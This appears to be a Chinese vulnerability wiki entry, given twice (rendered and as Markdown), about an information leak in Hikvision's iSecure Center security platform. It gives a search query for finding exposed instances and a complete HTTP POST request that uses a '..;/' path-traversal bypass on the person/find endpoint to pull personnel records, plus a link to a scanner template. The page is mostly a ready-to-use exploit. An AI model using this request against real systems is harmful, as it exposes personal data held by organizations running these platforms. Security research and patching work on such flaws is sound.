fofamini-wiki

登录白背景

源码

海康威视iSecure Center综合安防管理平台find信息泄漏漏洞

一、漏洞简介

HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取环境find等敏感信息进一步攻击。

二、影响版本

HIKVISION 综合安防管理平台

三、资产测绘

hunter查询语法：
app.name=="Hikvision 海康威视 iSecure Center"

登录页面

四、漏洞复现

POST /isupm/api/api/..;/..;/person/find HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Length: 95
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip, deflate

{"organizationId":"root000000","pageSize":100,"pageNo":1,"name":"","casecadeSubOrganization":1}

hikvision-find-info.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/vzdf0l0dggn48gti

# 海康威视iSecure Center综合安防管理平台find信息泄漏漏洞

# 一、漏洞简介
HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取环境find等敏感信息进一步攻击。

# 二、影响版本

- HIKVISION 综合安防管理平台

# 三、资产测绘
**hunter查询语法：**
`app.name=="Hikvision 海康威视 iSecure Center"`
![image.png](./img/XS4nHgxFeZcZ-7E8/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-413935.png)

- 登录页面

![image.png](./img/XS4nHgxFeZcZ-7E8/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-802487.png)

# 四、漏洞复现
```java
POST /isupm/api/api/..;/..;/person/find HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Length: 95
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip, deflate

{"organizationId":"root000000","pageSize":100,"pageNo":1,"name":"","casecadeSubOrganization":1}
```
![image.png](./img/XS4nHgxFeZcZ-7E8/1711371978631-07879775-bcdf-4673-853d-c0e370b7119d-013741.png)
[hikvision-find-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1717211077763-07464109-609f-4f5b-bd65-72b7a7d05fe6.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F29512878%2F1717211077763-07464109-609f-4f5b-bd65-72b7a7d05fe6.yaml%22%2C%22name%22%3A%22hikvision-find-info.yaml%22%2C%22size%22%3A860%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ued2010b0-bddd-46a0-b903-7c2ffd79d83%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u8a958698%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vzdf0l0dggn48gti>